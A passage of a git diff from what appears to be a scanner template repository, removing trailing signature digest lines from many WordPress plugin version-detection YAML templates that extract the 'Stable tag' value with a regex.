490a0046304402204fc72c7c54a5c4895726ff562d904e606397f4daf13abc24f10e8d6d145d5aa502203bac121b6082b62035b149c9a533fbe95054263b16aa7a098dbd6cbbd3793283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f281771586..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053d8d775f4c2da6ab793936102465c09ad5b6f325436ba58bd1bbe4447ef1c69022040051205aaa368b1265705a3b2ce2334b511600598e27f9942b1d6b4c6de381b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index f567011582..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009183ad26829df8e0207645c9ffb69f9c1bd2270dcf2cc308a00a886caa1f6108022100cd85a671c986b59ed183d4ea5d75c1433e004c40607a94c03cec553a5a739cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index f278f03681..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd647eb856da6b75e6c07fa16bbe279bde07a1f84f134d947f07c4969a5ccd2902205cfdf33ca31917ba0dea2b3f6f221566eb8685cce03f719cf5a48cb93e9bb61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 4a99ac4c4a..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061834ef92a7fcd36418fc84873faa9df57c1f1a38c8ae9b2b682630d2413361202200878e776c4a053ada5ffe24ccf9076ba6ab8a54077fd3ba6df3d9458415e6e1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 562005baa4..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204e311461fa44336d780371acf43ffc07651f43944811c0611865d2b03e06d9a402200d7455c866801c1788e15886554ac5d05adebfd688733a296f5bfc5a93e2dc96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 0f39d2b12f..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3bc7547d9878df142ed4a9096973dd612ea65c7e2ba2db940608bfbd21b21b302204e9b49d0fe633ad7b0e38ae65b5362a6fa94aeed4e279f6e84c397f9dc398d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index d5481aaa95..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202473b9a58028fcb6e5b6881830a54e4a910ccb9f34b4f587bee5758a8a6cdad502210084671776c7e3679c5f742de31c45c508cc2ca4446e056a83ff94685f3742ca74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 616edc4084..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009305a82e38c20c4dd22af3d1664f1b51ec7a6afc100922ecfc39f4c66632630702201b47254e203716996a3c3f34bbdc96f50b08622162723f814f5e3f58e45b91b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0b36df7802..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2a2532b4dffd18a3642a270f0d5888084b6131cb8c387ccb9e13e7f2ffb52f0022100b5f316ecbf6935cf104656183b386cb86f600fdea44aaeaff4cd124611111380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index f44e1389ea..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054dd94f232f431cf5b23d7e16f800ebd80b86a5f2291f409fe363ab325b752e502206165717c262f7bae9e6ddf0d197818c2b6bbe74dcb936a5bc3443d60074e0d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 8c9cafe762..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203bfb4681700fbfef19216573f9c8e1b472cd14137fe16e8c108f90e4af147a81022100d176db333bda54996181bd0f4f7510bf15e153818e977cc0338503e122ce8de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 0b51d90888..e13909fff3 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d684f735bb6e9125dc78a0fa8c6de280326aa72a21131a7acdb95ef36cd16464022100c8ab1809300586f61d786c78521b7b562f7d48e46374931beaafa1e4a2099b03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 626039cec1..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210086e4e399f56369bc2a6e2280dafb6e7791840fe81bdf17b00d47e8c4ef1f754e022100fd6f2c252e36f138b1bf08dbead1a52a5df23676aa3b46271a96600d8eb35986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 010cc342b2..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3b7d6c68d9d96a03825bcdb04adb933cac2ec15c9f19633b5825065c3b54e4e022100ec3bf52c2b8db8e942aaa78f8020f8d2af43bf57d837835a0ec4381b2c128a72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 4391a68f73..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9e2012af3256790c48cf473a856bb3cd8dde30f837b9b0de9b377408b1ee7a002207ff60250b3dadb7426a54ca742e809c2ba9fbaf21c3baef95f85ab0ebd505412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 6e7902f29d..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ed48e7464dcaffcb8b810cddf1392b6f6fba84ce5c940e2ac0bf82a19a0164e02200ccea8907917720bb9b999c579fb1d97f336411694dbb5a899378f214764374d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 389f799348..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201957afdbf5bf6a348fe93c320f3bcc6b2b206f540b09b17993b81ce6917d127602205b1a0de3d3f24f1defaac988cad1daddc391e71fe7f3765f2ce6306d4fe61a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cb88b6e88b..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de4754db3a98f1365931e3cb4e397ec9fc5b0fcf635767eb52fad28ee512c0d402210095d4a170be64406d6a58101d3f4fc8c67b2d0a19c514714263a46bd686cf1dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ed31f254f7..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001d705f9c26b4b00f686a10e5f15b3261bcd195d2c88fb5ef83516a2e25268d202202f633a08b749a9ae9d88e3328d9f51f4ac8abc80c5a1ac37b4db5f786157980f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a5e1827195..dafbd25c9e 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078e4e56aec7d69e77596c39bd9b3951865c6c0f355fd0e6eb467a7be04f5e0ba022030d49e9c379c8ad735c9a6181a8381ec4a1e818ef191d093ea897e99906b2087:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index dc92a1eca8..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035117b0c41fe76b22813490b622c71b6dee3b43c34e27e9a5570bb9f2f13e5250220091ff128c7f94df5e644772f84581579db2716f280cc3e75e6f8b49f34e69582:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 721c1a9ffc..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c78579c4250daef80cd8630c463c0e01a7788adaca5911fc8288408dd3a0e2b9022100a8018063abebd79e45486b606b172676008ffa9fcd430cdea617ae30fd3c3abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b5cf6755b2..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220469fe40f2c7797915d8adc687873d438b8d2162c088d491002b75fdb49ee7edd022002bfe4a2e1c07e4849560a5679f977f66ea3568692171a7987c9d7a69b71e548:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 099ab66832..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fcd201ff75793a9f6d85e8c05c5845881512e17892801eb942118aebde1f840d02201c2d256a08df45cfba1d12e92e19c2549400fc5c11a29bbc7d324c4944b15bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index b1b0c3a0db..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a76d04f231e0763bf6e5ed549d91a6880d324071be36c808553acb98177b741a022100cc6c770f90e09e874fd86dd841830bddf049b850031e1a6a1ce6c8a3ad41a553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 565a803bab..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220035f6968107e3e1a5e5fc0f4f9d468d0f026837b6de412fb5b2c2043da92da53022100d134063ba4f5e69940fd3bbc749db3f543286514b9485ba1b5b87e90a687e893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 308ac84ffe..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200af0d1dda9d3578e9162ac74073a5715a8ee18ba05cad0c2e7da9c4ae5afbfa902202ebd30c7866ccd5bdabcc145b950aef0c1e8755c3dbe1b540db85a41dd4d005c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index f4b03bbc19..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da8c4d534e7c4e8ace6d83537f50f92e004bd78ce1b129e2549c09650ed69b02022035479b9f1f04787db6ebf7d3f699066eabd4c14163b52a6ef33b37229a116eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 35dbb4df99..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004b62504a1522b01040f97348a6a062f6f89966a728d235cdad8a3018c2bcffc022016459e5a09188c94d5309e0a7a5147df120f0d1eef5223865b9e3705caef1ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 43d55d6c67..fe4c223cba 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f27d7023ff1421cea6d637609df44486ea931048cbe79320617a4abd01b246f20221009ebccbe45ffafbcfff16e3ccd7d841e24f2bd1d88c1cd1766f3ff0a7a044a772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index b6ff3ac71a..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092cdfcf61d1008898d4374f94f521a51729aafccaa7050a905a2a6ad9d455252022068b94c1ae1ad1a0fb61d01e2f2d72720a967c298b059e804131fbdef69260838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index a0b13294bb..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aac909f91a35269c19d05b43c218f58df4bff35a5fab7026f41b410a0e27add7022052a143d3808137dfcf7975ea87f8baef769476cc77c132bdb8100c2d72e83c4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index d85fa33de3..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097c3d259a6ba05d8f0b46b07e76b6865bebe927e418a1f385f57b1eaa1c388cd0220482c9d7d4af5883bd23368e4ee61afd2a0e57f6018e6ea418c1698513cf03a8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 3c79ff070a..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022037454061542f1170aa66f699c86d3ca9a5da1cf17b6ba8ff2a9ccb4403c9e15a0221009e78736ac436836ad70323d4554d86f9652bbea949081ed44b2aec1069db1556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index b42c756957..5ea77f898d 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fe87167d9251652cb020ef094914c228d475049c0ef89e9f104ad45965dd793e0221009cb55d6bb095d7997e1c0c206dfe83f2f6e43ee804240ccfc41d0808a268a6bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index da80c9460d..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b317e5f6d9ff1a5c7cc16f6fa5480a24d2a8ded092757542e84eede17b951d18022100ccb72d7f928da145c2094a95e20d4d4d117d81f446dace8ff10b1c30ad42707c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index b50f2b2df8..554a7ddc52 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f0c547f6bc09e8d1de57b4bf080573edb0a77c82fec3bd64a4265f37861db42022042a1bbaeb32b629ab5a94fa4d37310a6deb6fae8b948c228bb45a2a7bc8ae167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 3111c7ffb2..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220479221ae2ef6616840994d80464ec0a4e3fa0394f41fa8496f1e214263acadab02205496af81fec9454dd42f54a32e5f64df221bcd8abb61c038d79b27a25f1a0c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index a2839a7927..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad535952f1774eb3ed8b62e32a3b6d2344fea9054fb3bb7974ac2eb8abbb3362022031e12e739e9986cf1dba6bbe8053877b44bfa6749378c32a868dc8b3cf221dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 74df3e5b2c..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201dfabdf21e8fc0f27a758af673b2de3b76e1b17a638adb9b7ddf5e8189fb4ce5022100800aead8ccec3a754ee3233d01c7e7b3265e1939f4fee79afd19b7bbdf9b4ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 5c0a227dab..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab75f28c24004e7395e21da0f29ac4577acef2ae95d986880e0ee8137eacc3f5022100f995617ebb6a94bd0c1dd3c6df7e657be3723f9ed9a913f2f46347805ae411fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 094e7240e0..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f6ff5f59a977627f6163d61d5e74b3f209ec111a6a6682eab98e7c0e19e22e4022100842d1083386ddd5ad50c35a1578cee5d06455756f1529201f22e434bf95fb540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 598e66b193..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207dcfcce7701a74ed5b824c77f72325e59f8be1ce3cb9c560c66ca55c34515d35022041930b199e38e873da28c474800c1e122c041b23430dad10bdf8bbacd7f6f9f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 764bb5fa57..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad961cb1e858fd0f527e3d966c0e39b698b865c25f938b009a0d74d24f7e1abe02206a53852c633d4b0cea0006e9221a583a52ab35d82ffdeb61453f96b2b2c09b8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 10f700ed55..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ef3c2eee7df4ccbb6475858a7e606f3fa165afda50f4b11925f66aaf985e97802202d748ebb177656534ac450d695ff1c6dead6f276243c3767c18641cf486a280f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index bac639d7df..ce5dc03713 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022041faf1de71e48d18b540dbda750b809f6167a6d6190d7b6508f591c5d6f36f2f022030ad996d0160f04724a74602b337c8607c58aaa1638d89a5b5d6c2339a1182d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 67f3645b48..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 